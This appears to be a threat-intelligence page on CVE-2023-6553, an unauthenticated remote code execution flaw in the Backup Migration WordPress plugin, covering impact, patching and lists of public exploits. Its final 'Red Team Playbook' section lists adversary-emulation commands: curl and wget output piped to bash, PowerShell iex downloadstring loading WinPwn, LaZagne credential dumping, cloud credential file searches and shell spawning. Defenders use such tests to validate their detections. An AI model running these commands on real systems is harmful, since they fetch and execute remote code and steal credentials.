CVE-2023-6553
Overview
This vulnerability is a Remote Code Execution (RCE) flaw caused by insecure dynamic inclusion of files within the Backup Migration plugin for WordPress. The root cause lies in inadequate validation of user-controlled input passed to an include statement in the /includes/backup-heart.php file. This improper input handling allows attackers to manipulate file paths, leading to execution of arbitrary code on the server hosting the plugin.
Vulnerability Description
The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated attackers to easily execute code on the server.
Impact
An unauthenticated remote attacker can execute arbitrary code on the web server running the vulnerable plugin, leading to full compromise of the hosting environment. No authentication or user interaction is required (AV:N/AC:L/PR:N/UI:N), allowing attackers to deploy web shells, manipulate data, or pivot within the network. This can result in data breaches, service disruption, and loss of control over the affected WordPress instance and underlying infrastructure.
Solution
Users should upgrade the Backup Migration plugin to a version later than 1.3.7 where the vulnerability is patched. Detailed patch information and remediation instructions are available from the Wordfence advisory at https://www.wordfence.com/threat-intel/vulnerabilities/id/3511ba64-56a3-43d7-8ab8-c6e40e3b686e. No official workaround is documented; therefore, updating to the fixed plugin version is the recommended mitigation step.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The Backup Migration plugin for WordPress has a critical vulnerability that allows for remote code execution due to improper handling of user input within the /includes/backup-heart.php file. This vulnerability arises from an attacker’s ability to manipulate the values passed to an include statement, leading to the execution of arbitrary code on the server. The flaw is particularly severe because it does not require authentication, enabling unauthenticated attackers to exploit the vulnerability with relative ease. The implications of this flaw are significant, as it can lead to complete server compromise, data breaches, and unauthorized access to sensitive information.
Exploitation of this vulnerability can occur through various attack vectors. An attacker may craft a malicious request that targets the vulnerable endpoint, injecting payloads that the server will execute. For instance, an attacker could send a specially crafted HTTP request that alters the parameters passed to the include statement, causing the server to execute malicious scripts hosted on an external server. This could be done using common web tools or scripts, making it accessible even to those with limited technical expertise. Once the attacker gains control, they can manipulate the server environment, install backdoors, or exfiltrate sensitive data, thereby escalating the risk to the organization.
The real-world impact of this vulnerability is profound, particularly for businesses that rely on WordPress for their web presence. The potential for remote code execution means that attackers can gain full control over the affected server, leading to data loss, service disruption, and reputational damage. Organizations may face significant financial repercussions, including costs associated with incident response, system recovery, and potential legal liabilities stemming from data breaches. Furthermore, the public disclosure of such an incident can severely damage customer trust and brand reputation, leading to long-term business consequences.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regularly updating the Backup Migration plugin to the latest version is crucial, as newer releases typically contain patches for known vulnerabilities. Additionally, employing web application firewalls (WAFs) can help filter out malicious requests before they reach the server. Monitoring server logs for unusual activity can also aid in early detection of exploitation attempts. Organizations should conduct regular security audits and vulnerability assessments to identify and remediate weaknesses in their web applications proactively. Educating staff about secure coding practices and the importance of timely updates can further bolster defenses against such vulnerabilities.
In conclusion, the vulnerability present in the Backup Migration plugin for WordPress poses a significant threat to the security of web applications. Its ability to facilitate remote code execution without authentication makes it an attractive target for attackers. Organizations must prioritize the detection and mitigation of this vulnerability through timely updates, robust security measures, and ongoing education to safeguard their digital assets and maintain the trust of their customers. The consequences of neglecting such vulnerabilities can be severe, underscoring the importance of a proactive cybersecurity posture.
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2023-6553, coinciding with the emergence of multiple new proof-of-concept exploits publicly available on prominent code-sharing platforms. Our telemetry indicates that adversaries are increasingly leveraging these tools to automate attacks against vulnerable Backup Migration plugin instances, broadening the exploit landscape beyond initial manual techniques. Although the EPSS score remains stable at a high level, the rapid proliferation of exploitation resources significantly lowers the barrier to entry for less sophisticated threat actors, thereby expanding the pool of potential attackers. This evolution elevates the overall threat level, as organizations face heightened risk of unauthenticated remote code execution leading to full server compromise. Defenders should recognize that the exploitation environment is becoming more dynamic and accessible, increasing the urgency for detection capabilities and monitoring of anomalous activity related to this vulnerability.
Update 2 — June 07, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2023-6553, accompanied by the emergence of additional proof-of-concept exploits that enhance attacker capabilities, including streamlined reverse shell deployment. This development broadens the exploit toolkit accessible to threat actors, lowering technical barriers and enabling a wider range of adversaries to leverage the vulnerability effectively. Our telemetry indicates that the increased exploitation activity is sustained rather than transient, signaling a persistent and growing threat environment. Consequently, the risk profile for affected organizations has intensified, as the likelihood of successful unauthenticated remote code execution attacks has risen. This evolution underscores an elevated threat level, with attackers now better equipped to achieve full server compromise, thereby amplifying potential operational and data security impacts.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Backupbliss | Backup Migration | All |
cpe:2.3:a:backupbliss:backup_migration:*:*:*:*:*:wordpress:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
WordPress Backup Migration Plugin PHP Filter Chain RCE
exploits/multi/http/wp_backup_migration_php_filter
|
Nex Team, Valentin Lobstein, jheysel-r7 | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| WordPress Backup Migration 1.3.7 - Remote Command Execution | dangwenjing | webapps | multiple | - | View |
GitHub PoCs (8)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Chocapikk/CVE-2023-6553
Backup Migration <= 1.3.7 - Unauthenticated Remote Code Execution
|
Chocapikk | 86 | 23 | 2023-12-13 | View |
|
motikan2010/CVE-2023-6553-PoC
|
motikan2010 | 4 | 1 | 2023-12-27 | View |
|
Aliyankhan-source/CVE-2023-6553-RCE-Fancy-Exploit
The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1...
|
Aliyankhan-source | 2 | 1 | 2026-04-10 | View |
|
0x00phantom-hat/CVE-2023-6553-RCE-Exploit
The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1...
|
0x00phantom-hat | 2 | 0 | 2026-04-10 | View |
|
joaoaugustom/WordPress_Backup_Migration-RCE_Unauthenticated
This exploit is based on CVE-2023-6553 and was built upon the original exploit by Chocapik, it was added that a direct r...
|
joaoaugustom | 0 | 1 | 2026-05-31 | View |
|
Dungsocool/CVE-2023-6553
|
Dungsocool | 0 | 0 | 2026-08-05 | View |
|
cc3305/CVE-2023-6553
CVE-2023-6553 exploit script
|
cc3305 | 0 | 0 | 2024-06-29 | View |
|
Harshit-Mashru/CVE-2023-6553
Exploit Development for CVE-2023-6553 on Backup Plugin in Wordpress
|
Harshit-Mashru | 0 | 0 | 2024-11-07 | View |
Threat Feed
9 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.